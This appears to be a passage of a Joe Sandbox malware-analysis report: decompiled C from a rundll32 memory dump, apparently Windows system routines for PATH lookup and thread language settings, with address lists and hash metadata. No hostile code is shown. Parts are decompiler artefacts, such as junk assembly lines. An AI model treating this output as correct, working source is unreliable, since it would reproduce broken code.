                                                                                            							case 1:
                                                                                            								L44:
                                                                                            								_t319 =  &_v64;
                                                                                            								_v80 = E04602E3E(0,  &_v64);
                                                                                            								_t289 = _t289 + _v64 + 2;
                                                                                            								goto L13;
                                                                                            							case 2:
                                                                                            								__eax =  *0x46c8480 & 0x0000ffff;
                                                                                            								__ebx = __ebx + __eax;
                                                                                            								__eflags = __dl;
                                                                                            								if(__dl != 0) {
                                                                                            									__eax = 0x46c8480;
                                                                                            									goto L80;
                                                                                            								}
                                                                                            								goto L14;
                                                                                            							case 3:
                                                                                            								__eax = E045EEEF0(0x46c79a0);
                                                                                            								__eax =  &_v44;
                                                                                            								_push(__eax);
                                                                                            								_push(0);
                                                                                            								_push(0);
                                                                                            								_push(4);
                                                                                            								_push(L"PATH");
                                                                                            								_push(0);
                                                                                            								L57();
                                                                                            								__esi = __eax;
                                                                                            								_v68 = __esi;
                                                                                            								__eflags = __esi - 0xc0000023;
                                                                                            								if(__esi != 0xc0000023) {
                                                                                            									L10:
                                                                                            									__eax = E045EEB70(__ecx, 0x46c79a0);
                                                                                            									__eflags = __esi - 0xc0000100;
                                                                                            									if(__esi == 0xc0000100) {
                                                                                            										_v44 = _v44 & 0x00000000;
                                                                                            										__eax = 0;
                                                                                            										_v68 = 0;
                                                                                            										goto L13;
                                                                                            									} else {
                                                                                            										__eflags = __esi;
                                                                                            										if(__esi < 0) {
                                                                                            											L32:
                                                                                            											_t217 = _v72;
                                                                                            											__eflags = _t217;
                                                                                            											if(_t217 != 0) {
                                                                                            												L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t217);
                                                                                            											}
                                                                                            											_t218 = _v52;
                                                                                            											__eflags = _t218;
                                                                                            											if(_t218 != 0) {
                                                                                            												__eflags = _t338;
                                                                                            												if(_t338 < 0) {
                                                                                            													L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t218);
                                                                                            													_t218 = 0;
                                                                                            												}
                                                                                            											}
                                                                                            											goto L36;
                                                                                            										} else {
                                                                                            											__eax = _v44;
                                                                                            											__ebx = __ebx + __eax * 2;
                                                                                            											__ebx = __ebx + 2;
                                                                                            											__eflags = __ebx;
                                                                                            											L13:
                                                                                            											_t299 = _v36;
                                                                                            											goto L14;
                                                                                            										}
                                                                                            									}
                                                                                            								} else {
                                                                                            									__eax = _v44;
                                                                                            									__ecx =  *0x46c7b9c; // 0x0
                                                                                            									_v44 + _v44 =  *[fs:0x30];
                                                                                            									__ecx = __ecx + 0x180000;
                                                                                            									__eax = L045F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                                                                                            									_v72 = __eax;
                                                                                            									__eflags = __eax;
                                                                                            									if(__eax == 0) {
                                                                                            										__eax = E045EEB70(__ecx, 0x46c79a0);
                                                                                            										__eax = _v52;
                                                                                            										L36:
                                                                                            										_pop(_t331);
                                                                                            										_pop(_t339);
                                                                                            										__eflags = _v8 ^ _t343;
                                                                                            										_pop(_t290);
                                                                                            										return E0461B640(_t218, _t290, _v8 ^ _t343, _t319, _t331, _t339);
                                                                                            									} else {
                                                                                            										__ecx =  &_v44;
                                                                                            										_push(__ecx);
                                                                                            										_push(_v44);
                                                                                            										_push(__eax);
                                                                                            										_push(4);
                                                                                            										_push(L"PATH");
                                                                                            										_push(0);
                                                                                            										L57();
                                                                                            										__esi = __eax;
                                                                                            										_v68 = __eax;
                                                                                            										goto L10;
                                                                                            									}
                                                                                            								}
                                                                                            								goto L108;
                                                                                            							case 4:
                                                                                            								__ebx = __ebx + 4;
                                                                                            								goto L14;
                                                                                            							case 5:
                                                                                            								_t285 = _v56;
                                                                                            								if(_v56 != 0) {
                                                                                            									_t319 =  &_v36;
                                                                                            									_t287 = E04602E3E(_t285,  &_v36);
                                                                                            									_t299 = _v36;
                                                                                            									_v76 = _t287;
                                                                                            								}
                                                                                            								if(_t299 == 0) {
                                                                                            									goto L44;
                                                                                            								} else {
                                                                                            									_t289 = _t289 + 2 + _t299;
                                                                                            								}
                                                                                            								goto L14;
                                                                                            							case 6:
                                                                                            								__eax =  *0x46c5764 & 0x0000ffff;
                                                                                            								goto L53;
                                                                                            							case 7:
                                                                                            								__eax =  *0x46c8478 & 0x0000ffff;
                                                                                            								__ebx = __ebx + __eax;
                                                                                            								__eflags = _a8;
                                                                                            								if(_a8 != 0) {
                                                                                            									__ebx = __ebx + 0x16;
                                                                                            									__ebx = __ebx + __eax;
                                                                                            								}
                                                                                            								__eflags = __dl;
                                                                                            								if(__dl != 0) {
                                                                                            									__eax = 0x46c8478;
                                                                                            									L80:
                                                                                            									_v32 = __eax;
                                                                                            								}
                                                                                            								goto L14;
                                                                                            							case 8:
                                                                                            								__eax =  *0x46c6e58 & 0x0000ffff;
                                                                                            								__eax = ( *0x46c6e58 & 0x0000ffff) + 2;
                                                                                            								L53:
                                                                                            								__ebx = __ebx + __eax;
                                                                                            								L14:
                                                                                            								_t330 = _t330 + 1;
                                                                                            								if(_t330 >= _v48) {
                                                                                            									goto L16;
                                                                                            								} else {
                                                                                            									_t319 = _v37;
                                                                                            									goto L1;
                                                                                            								}
                                                                                            								goto L108;
                                                                                            						}
                                                                                            					}
                                                                                            					L56:
                                                                                            					_push(0x25);
                                                                                            					asm("int 0x29");
                                                                                            					asm("out 0x28, al");
                                                                                            					asm("pushad");
                                                                                            					_t244 = _t243 + 0x66;
                                                                                            					 *((intOrPtr*)(_t244 + 4)) =  *((intOrPtr*)(_t244 + 4)) - _t244;
                                                                                            					asm("loopne 0x29");
                                                                                            					asm("pushad");
                                                                                            					asm("pushad");
                                                                                            					_t246 = _t244 + 0x74;
                                                                                            					 *((intOrPtr*)(_t246 + 4)) =  *((intOrPtr*)(_t246 + 4)) - _t246;
                                                                                            					_t248 = _t246 + 0x1f0460ba;
                                                                                            					 *((intOrPtr*)(_t248 + 4)) =  *((intOrPtr*)(_t248 + 4)) - _t248;
                                                                                            					_t249 = _t248 ^ 0x0204645b;
                                                                                            					 *((intOrPtr*)(_t249 + 4)) =  *((intOrPtr*)(_t249 + 4)) - _t347;
                                                                                            					 *_t249 =  *_t249 - 0x60;
                                                                                            					asm("daa");
                                                                                            					asm("pushad");
                                                                                            					_t251 = _t249 + 0x114;
                                                                                            					 *((intOrPtr*)(_t251 + 4)) =  *((intOrPtr*)(_t251 + 4)) - _t251;
                                                                                            					_t340 = _t337 - 1;
                                                                                            					 *((intOrPtr*)(_t251 + 4)) =  *((intOrPtr*)(_t251 + 4)) - _t251;
                                                                                            					asm("daa");
                                                                                            					asm("pushad");
                                                                                            					_pop(_t295);
                                                                                            					 *((intOrPtr*)(_t251 + 0x190)) =  *((intOrPtr*)(_t251 + 0x190)) - _t251 + 0x18c;
                                                                                            					asm("int3");
                                                                                            					asm("int3");
                                                                                            					asm("int3");
                                                                                            					asm("int3");
                                                                                            					asm("int3");
                                                                                            					asm("int3");
                                                                                            					asm("int3");
                                                                                            					asm("int3");
                                                                                            					asm("int3");
                                                                                            					asm("int3");
                                                                                            					asm("int3");
                                                                                            					asm("int3");
                                                                                            					asm("int3");
                                                                                            					asm("int3");
                                                                                            					asm("int3");
                                                                                            					asm("int3");
                                                                                            					asm("int3");
                                                                                            					asm("int3");
                                                                                            					_push(0x20);
                                                                                            					_push(0x46aff00);
                                                                                            					E0462D08C(_t295, _t332, _t340);
                                                                                            					_v44 =  *[fs:0x18];
                                                                                            					_t333 = 0;
                                                                                            					 *_a24 = 0;
                                                                                            					_t296 = _a12;
                                                                                            					__eflags = _t296;
                                                                                            					if(_t296 == 0) {
                                                                                            						_t258 = 0xc0000100;
                                                                                            					} else {
                                                                                            						_v8 = 0;
                                                                                            						_t341 = 0xc0000100;
                                                                                            						_v52 = 0xc0000100;
                                                                                            						_t260 = 4;
                                                                                            						while(1) {
                                                                                            							_v40 = _t260;
                                                                                            							__eflags = _t260;
                                                                                            							if(_t260 == 0) {
                                                                                            								break;
                                                                                            							}
                                                                                            							_t309 = _t260 * 0xc;
                                                                                            							_v48 = _t309;
                                                                                            							__eflags = _t296 -  *((intOrPtr*)(_t309 + 0x45b1664));
                                                                                            							if(__eflags <= 0) {
                                                                                            								if(__eflags == 0) {
                                                                                            									_t275 = E0461E5C0(_a8,  *((intOrPtr*)(_t309 + 0x45b1668)), _t296);
                                                                                            									_t347 = _t347 + 0xc;
                                                                                            									__eflags = _t275;
                                                                                            									if(__eflags == 0) {
                                                                                            										_t341 = E046551BE(_t296,  *((intOrPtr*)(_v48 + 0x45b166c)), _a16, _t333, _t341, __eflags, _a20, _a24);
                                                                                            										_v52 = _t341;
                                                                                            										break;
                                                                                            									} else {
                                                                                            										_t260 = _v40;
                                                                                            										goto L62;
                                                                                            									}
                                                                                            									goto L70;
                                                                                            								} else {
                                                                                            									L62:
                                                                                            									_t260 = _t260 - 1;
                                                                                            									continue;
                                                                                            								}
                                                                                            							}
                                                                                            							break;
                                                                                            						}
                                                                                            						_v32 = _t341;
                                                                                            						__eflags = _t341;
                                                                                            						if(_t341 < 0) {
                                                                                            							__eflags = _t341 - 0xc0000100;
                                                                                            							if(_t341 == 0xc0000100) {
                                                                                            								_t305 = _a4;
                                                                                            								__eflags = _t305;
                                                                                            								if(_t305 != 0) {
                                                                                            									_v36 = _t305;
                                                                                            									__eflags =  *_t305 - _t333;
                                                                                            									if( *_t305 == _t333) {
                                                                                            										_t341 = 0xc0000100;
                                                                                            										goto L76;
                                                                                            									} else {
                                                                                            										_t321 =  *((intOrPtr*)(_v44 + 0x30));
                                                                                            										_t262 =  *((intOrPtr*)(_t321 + 0x10));
                                                                                            										__eflags =  *((intOrPtr*)(_t262 + 0x48)) - _t305;
                                                                                            										if( *((intOrPtr*)(_t262 + 0x48)) == _t305) {
                                                                                            											__eflags =  *(_t321 + 0x1c);
                                                                                            											if( *(_t321 + 0x1c) == 0) {
                                                                                            												L106:
                                                                                            												_t341 = E04602AE4( &_v36, _a8, _t296, _a16, _a20, _a24);
                                                                                            												_v32 = _t341;
                                                                                            												__eflags = _t341 - 0xc0000100;
                                                                                            												if(_t341 != 0xc0000100) {
                                                                                            													goto L69;
                                                                                            												} else {
                                                                                            													_t333 = 1;
                                                                                            													_t305 = _v36;
                                                                                            													goto L75;
                                                                                            												}
                                                                                            											} else {
                                                                                            												_t265 = E045E6600( *(_t321 + 0x1c));
                                                                                            												__eflags = _t265;
                                                                                            												if(_t265 != 0) {
                                                                                            													goto L106;
                                                                                            												} else {
                                                                                            													_t305 = _a4;
                                                                                            													goto L75;
                                                                                            												}
                                                                                            											}
                                                                                            										} else {
                                                                                            											L75:
                                                                                            											_t341 = E04602C50(_t305, _a8, _t296, _a16, _a20, _a24, _t333);
                                                                                            											L76:
                                                                                            											_v32 = _t341;
                                                                                            											goto L69;
                                                                                            										}
                                                                                            									}
                                                                                            									goto L108;
                                                                                            								} else {
                                                                                            									E045EEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                            									_v8 = 1;
                                                                                            									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
                                                                                            									_t341 = _a24;
                                                                                            									_t272 = E04602AE4( &_v36, _a8, _t296, _a16, _a20, _t341);
                                                                                            									_v32 = _t272;
                                                                                            									__eflags = _t272 - 0xc0000100;
                                                                                            									if(_t272 == 0xc0000100) {
                                                                                            										_v32 = E04602C50(_v36, _a8, _t296, _a16, _a20, _t341, 1);
                                                                                            									}
                                                                                            									_v8 = _t333;
                                                                                            									E04602ACB();
                                                                                            								}
                                                                                            							}
                                                                                            						}
                                                                                            						L69:
                                                                                            						_v8 = 0xfffffffe;
                                                                                            						_t258 = _t341;
                                                                                            					}
                                                                                            					L70:
                                                                                            					return E0462D0D1(_t258);
                                                                                            				}
                                                                                            				L108:
                                                                                            			}
























































                                                                                            0x00000000
                                                                                            0x04602756
                                                                                            0x04602750
                                                                                            0x00000000
                                                                                            0x04602794
                                                                                            0x04602794
                                                                                            0x04602795
                                                                                            0x04602798
                                                                                            0x04602798
                                                                                            0x00000000
                                                                                            0x04602734
                                                                                            0x0460272c
                                                                                            0x04602700
                                                                                            0x046025ef
                                                                                            0x046025ef
                                                                                            0x046025ef
                                                                                            0x046025f2
                                                                                            0x046025f8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x046025fe
                                                                                            0x00000000
                                                                                            0x046028e6
                                                                                            0x046028ec
                                                                                            0x046028ef
                                                                                            0x046028f5
                                                                                            0x046028f8
                                                                                            0x046028f8
                                                                                            0x00000000
                                                                                            0x046028f8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04602866
                                                                                            0x04602866
                                                                                            0x04602876
                                                                                            0x04602879
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x046027e0
                                                                                            0x046027e7
                                                                                            0x046027e9
                                                                                            0x046027eb
                                                                                            0x04645afd
                                                                                            0x00000000
                                                                                            0x04645afd
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04602633
                                                                                            0x04602638
                                                                                            0x0460263b
                                                                                            0x0460263c
                                                                                            0x0460263e
                                                                                            0x04602640
                                                                                            0x04602642
                                                                                            0x04602647
                                                                                            0x04602649
                                                                                            0x0460264e
                                                                                            0x04602650
                                                                                            0x04602653
                                                                                            0x04602659
                                                                                            0x046026a2
                                                                                            0x046026a7
                                                                                            0x046026ac
                                                                                            0x046026b2
                                                                                            0x04645b11
                                                                                            0x04645b15
                                                                                            0x04645b17
                                                                                            0x00000000
                                                                                            0x046026b8
                                                                                            0x046026b8
                                                                                            0x046026ba
                                                                                            0x046027a6
                                                                                            0x046027a6
                                                                                            0x046027a9
                                                                                            0x046027ab
                                                                                            0x046027b9
                                                                                            0x046027b9
                                                                                            0x046027be
                                                                                            0x046027c1
                                                                                            0x046027c3
                                                                                            0x046027c5
                                                                                            0x046027c7
                                                                                            0x04645c74
                                                                                            0x04645c79
                                                                                            0x04645c79
                                                                                            0x046027c7
                                                                                            0x00000000
                                                                                            0x046026c0
                                                                                            0x046026c0
                                                                                            0x046026c3
                                                                                            0x046026c6
                                                                                            0x046026c6
                                                                                            0x046026c9
                                                                                            0x046026c9
                                                                                            0x00000000
                                                                                            0x046026c9
                                                                                            0x046026ba
                                                                                            0x0460265b
                                                                                            0x0460265b
                                                                                            0x0460265e
                                                                                            0x04602667
                                                                                            0x0460266d
                                                                                            0x04602677
                                                                                            0x0460267c
                                                                                            0x0460267f
                                                                                            0x04602681
                                                                                            0x04645b49
                                                                                            0x04645b4e
                                                                                            0x046027cd
                                                                                            0x046027d0
                                                                                            0x046027d1
                                                                                            0x046027d2
                                                                                            0x046027d4
                                                                                            0x046027dd
                                                                                            0x04602687
                                                                                            0x04602687
                                                                                            0x0460268a
                                                                                            0x0460268b
                                                                                            0x0460268e
                                                                                            0x0460268f
                                                                                            0x04602691
                                                                                            0x04602696
                                                                                            0x04602698
                                                                                            0x0460269d
                                                                                            0x0460269f
                                                                                            0x00000000
                                                                                            0x0460269f
                                                                                            0x04602681
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04602846
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04602605
                                                                                            0x0460260a
                                                                                            0x0460260c
                                                                                            0x04602611
                                                                                            0x04602616
                                                                                            0x04602619
                                                                                            0x04602619
                                                                                            0x0460261e
                                                                                            0x00000000
                                                                                            0x04602624
                                                                                            0x04602627
                                                                                            0x04602627
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04645b1f
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04602894
                                                                                            0x0460289b
                                                                                            0x0460289d
                                                                                            0x046028a1
                                                                                            0x04645b2b
                                                                                            0x04645b2e
                                                                                            0x04645b2e
                                                                                            0x046028a7
                                                                                            0x046028a9
                                                                                            0x04645b04
                                                                                            0x04645b09
                                                                                            0x04645b09
                                                                                            0x04645b09
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04645b35
                                                                                            0x04645b3c
                                                                                            0x046028fb
                                                                                            0x046028fb
                                                                                            0x046026cc
                                                                                            0x046026cc
                                                                                            0x046026d0
                                                                                            0x00000000
                                                                                            0x046026d2
                                                                                            0x046026d2
                                                                                            0x00000000
                                                                                            0x046026d2
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x046025fe
                                                                                            0x0460292d
                                                                                            0x0460292d
                                                                                            0x04602930
                                                                                            0x04602935
                                                                                            0x04602937
                                                                                            0x04602938
                                                                                            0x0460293a
                                                                                            0x0460293d
                                                                                            0x0460293f
                                                                                            0x04602942
                                                                                            0x04602944
                                                                                            0x04602946
                                                                                            0x0460294f
                                                                                            0x04602952
                                                                                            0x04602955
                                                                                            0x0460295a
                                                                                            0x0460295d
                                                                                            0x04602962
                                                                                            0x04602963
                                                                                            0x04602964
                                                                                            0x04602966
                                                                                            0x04602969
                                                                                            0x0460296a
                                                                                            0x0460296e
                                                                                            0x0460296f
                                                                                            0x04602972
                                                                                            0x04602976
                                                                                            0x0460297e
                                                                                            0x0460297f
                                                                                            0x04602980
                                                                                            0x04602981
                                                                                            0x04602982
                                                                                            0x04602983
                                                                                            0x04602984
                                                                                            0x04602985
                                                                                            0x04602986
                                                                                            0x04602987
                                                                                            0x04602988
                                                                                            0x04602989
                                                                                            0x0460298a
                                                                                            0x0460298b
                                                                                            0x0460298c
                                                                                            0x0460298d
                                                                                            0x0460298e
                                                                                            0x0460298f
                                                                                            0x04602990
                                                                                            0x04602992
                                                                                            0x04602997
                                                                                            0x046029a3
                                                                                            0x046029a6
                                                                                            0x046029ab
                                                                                            0x046029ad
                                                                                            0x046029b0
                                                                                            0x046029b2
                                                                                            0x04645c80
                                                                                            0x046029b8
                                                                                            0x046029b8
                                                                                            0x046029bb
                                                                                            0x046029c0
                                                                                            0x046029c5
                                                                                            0x046029c6
                                                                                            0x046029c6
                                                                                            0x046029c9
                                                                                            0x046029cb
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x046029cd
                                                                                            0x046029d0
                                                                                            0x046029d9
                                                                                            0x046029db
                                                                                            0x046029dd
                                                                                            0x04602a7f
                                                                                            0x04602a84
                                                                                            0x04602a87
                                                                                            0x04602a89
                                                                                            0x04645ca1
                                                                                            0x04645ca3
                                                                                            0x00000000
                                                                                            0x04602a8f
                                                                                            0x04602a8f
                                                                                            0x00000000
                                                                                            0x04602a8f
                                                                                            0x00000000
                                                                                            0x046029e3
                                                                                            0x046029e3
                                                                                            0x046029e3
                                                                                            0x00000000
                                                                                            0x046029e3
                                                                                            0x046029dd
                                                                                            0x00000000
                                                                                            0x046029db

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: PATH
                                                                                            • API String ID: 0-1036084923
                                                                                            • Opcode ID: 580bae1edd76f248b4251af525992758b19f4f95bb5683e39a196a0645b97f29
                                                                                            • Instruction ID: d06f979bce657fd55be0c8e9c201a566079d666c045c9cc10686b1cccadf550d
                                                                                            • Opcode Fuzzy Hash: 580bae1edd76f248b4251af525992758b19f4f95bb5683e39a196a0645b97f29
                                                                                            • Instruction Fuzzy Hash: E1C19071E10219DBDB28DF99D894ABEB7B5FF48704F148069E501AB290F734BD42CBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 80%
                                                                                            			E0460FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                                                                                            				char _v5;
                                                                                            				signed int _v8;
                                                                                            				signed int _v12;
                                                                                            				char _v16;
                                                                                            				char _v17;
                                                                                            				char _v20;
                                                                                            				signed int _v24;
                                                                                            				char _v28;
                                                                                            				char _v32;
                                                                                            				signed int _v40;
                                                                                            				void* __ecx;
                                                                                            				void* __edi;
                                                                                            				void* __ebp;
                                                                                            				signed int _t73;
                                                                                            				intOrPtr* _t75;
                                                                                            				signed int _t77;
                                                                                            				signed int _t79;
                                                                                            				signed int _t81;
                                                                                            				intOrPtr _t83;
                                                                                            				intOrPtr _t85;
                                                                                            				intOrPtr _t86;
                                                                                            				signed int _t91;
                                                                                            				signed int _t94;
                                                                                            				signed int _t95;
                                                                                            				signed int _t96;
                                                                                            				signed int _t106;
                                                                                            				signed int _t108;
                                                                                            				signed int _t114;
                                                                                            				signed int _t116;
                                                                                            				signed int _t118;
                                                                                            				signed int _t122;
                                                                                            				signed int _t123;
                                                                                            				void* _t129;
                                                                                            				signed int _t130;
                                                                                            				void* _t132;
                                                                                            				intOrPtr* _t134;
                                                                                            				signed int _t138;
                                                                                            				signed int _t141;
                                                                                            				signed int _t147;
                                                                                            				intOrPtr _t153;
                                                                                            				signed int _t154;
                                                                                            				signed int _t155;
                                                                                            				signed int _t170;
                                                                                            				void* _t174;
                                                                                            				signed int _t176;
                                                                                            				signed int _t177;
                                                                                            
                                                                                            				_t129 = __ebx;
                                                                                            				_push(_t132);
                                                                                            				_push(__esi);
                                                                                            				_t174 = _t132;
                                                                                            				_t73 =  !( *( *(_t174 + 0x18)));
                                                                                            				if(_t73 >= 0) {
                                                                                            					L5:
                                                                                            					return _t73;
                                                                                            				} else {
                                                                                            					E045EEEF0(0x46c7b60);
                                                                                            					_t134 =  *0x46c7b84; // 0x77e07b80
                                                                                            					_t2 = _t174 + 0x24; // 0x24
                                                                                            					_t75 = _t2;
                                                                                            					if( *_t134 != 0x46c7b80) {
                                                                                            						_push(3);
                                                                                            						asm("int 0x29");
                                                                                            						asm("int3");
                                                                                            						asm("int3");
                                                                                            						asm("int3");
                                                                                            						asm("int3");
                                                                                            						asm("int3");
                                                                                            						asm("int3");
                                                                                            						asm("int3");
                                                                                            						asm("int3");
                                                                                            						asm("int3");
                                                                                            						asm("int3");
                                                                                            						asm("int3");
                                                                                            						asm("int3");
                                                                                            						asm("int3");
                                                                                            						asm("int3");
                                                                                            						asm("int3");
                                                                                            						asm("int3");
                                                                                            						asm("int3");
                                                                                            						asm("int3");
                                                                                            						asm("int3");
                                                                                            						_push(0x46c7b60);
                                                                                            						_t170 = _v8;
                                                                                            						_v28 = 0;
                                                                                            						_v40 = 0;
                                                                                            						_v24 = 0;
                                                                                            						_v17 = 0;
                                                                                            						_v32 = 0;
                                                                                            						__eflags = _t170 & 0xffff7cf2;
                                                                                            						if((_t170 & 0xffff7cf2) != 0) {
                                                                                            							L43:
                                                                                            							_t77 = 0xc000000d;
                                                                                            						} else {
                                                                                            							_t79 = _t170 & 0x0000000c;
                                                                                            							__eflags = _t79;
                                                                                            							if(_t79 != 0) {
                                                                                            								__eflags = _t79 - 0xc;
                                                                                            								if(_t79 == 0xc) {
                                                                                            									goto L43;
                                                                                            								} else {
                                                                                            									goto L9;
                                                                                            								}
                                                                                            							} else {
                                                                                            								_t170 = _t170 | 0x00000008;
                                                                                            								__eflags = _t170;
                                                                                            								L9:
                                                                                            								_t81 = _t170 & 0x00000300;
                                                                                            								__eflags = _t81 - 0x300;
                                                                                            								if(_t81 == 0x300) {
                                                                                            									goto L43;
                                                                                            								} else {
                                                                                            									_t138 = _t170 & 0x00000001;
                                                                                            									__eflags = _t138;
                                                                                            									_v24 = _t138;
                                                                                            									if(_t138 != 0) {
                                                                                            										__eflags = _t81;
                                                                                            										if(_t81 != 0) {
                                                                                            											goto L43;
                                                                                            										} else {
                                                                                            											goto L11;
                                                                                            										}
                                                                                            									} else {
                                                                                            										L11:
                                                                                            										_push(_t129);
                                                                                            										_t77 = E045E6D90( &_v20);
                                                                                            										_t130 = _t77;
                                                                                            										__eflags = _t130;
                                                                                            										if(_t130 >= 0) {
                                                                                            											_push(_t174);
                                                                                            											__eflags = _t170 & 0x00000301;
                                                                                            											if((_t170 & 0x00000301) == 0) {
                                                                                            												_t176 = _a8;
                                                                                            												__eflags = _t176;
                                                                                            												if(__eflags == 0) {
                                                                                            													L64:
                                                                                            													_t83 =  *[fs:0x18];
                                                                                            													_t177 = 0;
                                                                                            													__eflags =  *(_t83 + 0xfb8);
                                                                                            													if( *(_t83 + 0xfb8) != 0) {
                                                                                            														E045E76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                                                                                            														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                                                                                            													}
                                                                                            													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                                                                                            													goto L15;
                                                                                            												} else {
                                                                                            													asm("sbb edx, edx");
                                                                                            													_t114 = E04678938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                                                                                            													__eflags = _t114;
                                                                                            													if(_t114 < 0) {
                                                                                            														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                                                                                            														E045DB150();
                                                                                            													}
                                                                                            													_t116 = E04676D81(_t176,  &_v16);
                                                                                            													__eflags = _t116;
                                                                                            													if(_t116 >= 0) {
                                                                                            														__eflags = _v16 - 2;
                                                                                            														if(_v16 < 2) {
                                                                                            															L56:
                                                                                            															_t118 = E045E75CE(_v20, 5, 0);
                                                                                            															__eflags = _t118;
                                                                                            															if(_t118 < 0) {
                                                                                            																L67:
                                                                                            																_t130 = 0xc0000017;
                                                                                            																goto L32;
                                                                                            															} else {
                                                                                            																__eflags = _v12;
                                                                                            																if(_v12 == 0) {
                                                                                            																	goto L67;
                                                                                            																} else {
                                                                                            																	_t153 =  *0x46c8638; // 0x29ec1a8
                                                                                            																	_t122 = L045E38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                                                                                            																	_t154 = _v12;
                                                                                            																	_t130 = _t122;
                                                                                            																	__eflags = _t130;
                                                                                            																	if(_t130 >= 0) {
                                                                                            																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                                                                                            																		__eflags = _t123;
                                                                                            																		if(_t123 != 0) {
                                                                                            																			_t155 = _a12;
                                                                                            																			__eflags = _t155;
                                                                                            																			if(_t155 != 0) {
                                                                                            																				 *_t155 = _t123;
                                                                                            																			}
                                                                                            																			goto L64;
                                                                                            																		} else {
                                                                                            																			E045E76E2(_t154);
                                                                                            																			goto L41;
                                                                                            																		}
                                                                                            																	} else {
                                                                                            																		E045E76E2(_t154);
                                                                                            																		_t177 = 0;
                                                                                            																		goto L18;
                                                                                            																	}
                                                                                            																}
                                                                                            															}
                                                                                            														} else {
                                                                                            															__eflags =  *_t176;
                                                                                            															if( *_t176 != 0) {
                                                                                            																goto L56;
                                                                                            															} else {
                                                                                            																__eflags =  *(_t176 + 2);
                                                                                            																if( *(_t176 + 2) == 0) {
                                                                                            																	goto L64;
                                                                                            																} else {
                                                                                            																	goto L56;
                                                                                            																}
                                                                                            															}
                                                                                            														}
                                                                                            													} else {
                                                                                            														_t130 = 0xc000000d;
                                                                                            														goto L32;
                                                                                            													}
                                                                                            												}
                                                                                            												goto L35;
                                                                                            											} else {
                                                                                            												__eflags = _a8;
                                                                                            												if(_a8 != 0) {
                                                                                            													_t77 = 0xc000000d;
                                                                                            												} else {
                                                                                            													_v5 = 1;
                                                                                            													L0460FCE3(_v20, _t170);
                                                                                            													_t177 = 0;
                                                                                            													__eflags = 0;
                                                                                            													L15:
                                                                                            													_t85 =  *[fs:0x18];
                                                                                            													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                                                                                            													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                                                                                            														L18:
                                                                                            														__eflags = _t130;
                                                                                            														if(_t130 != 0) {
                                                                                            															goto L32;
                                                                                            														} else {
                                                                                            															__eflags = _v5 - _t130;
                                                                                            															if(_v5 == _t130) {
                                                                                            																goto L32;
                                                                                            															} else {
                                                                                            																_t86 =  *[fs:0x18];
                                                                                            																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                                                                                            																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                                                                                            																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                                                                                            																}
                                                                                            																__eflags = _t177;
                                                                                            																if(_t177 == 0) {
                                                                                            																	L31:
                                                                                            																	__eflags = 0;
                                                                                            																	L045E70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                                                                                            																	goto L32;
                                                                                            																} else {
                                                                                            																	__eflags = _v24;
                                                                                            																	_t91 =  *(_t177 + 0x20);
                                                                                            																	if(_v24 != 0) {
                                                                                            																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                                                                                            																		goto L31;
                                                                                            																	} else {
                                                                                            																		_t141 = _t91 & 0x00000040;
                                                                                            																		__eflags = _t170 & 0x00000100;
                                                                                            																		if((_t170 & 0x00000100) == 0) {
                                                                                            																			__eflags = _t141;
                                                                                            																			if(_t141 == 0) {
                                                                                            																				L74:
                                                                                            																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                                                                                            																				goto L27;
                                                                                            																			} else {
                                                                                            																				_t177 = E0460FD22(_t177);
                                                                                            																				__eflags = _t177;
                                                                                            																				if(_t177 == 0) {
                                                                                            																					goto L42;
                                                                                            																				} else {
                                                                                            																					_t130 = E0460FD9B(_t177, 0, 4);
                                                                                            																					__eflags = _t130;
                                                                                            																					if(_t130 != 0) {
                                                                                            																						goto L42;
                                                                                            																					} else {
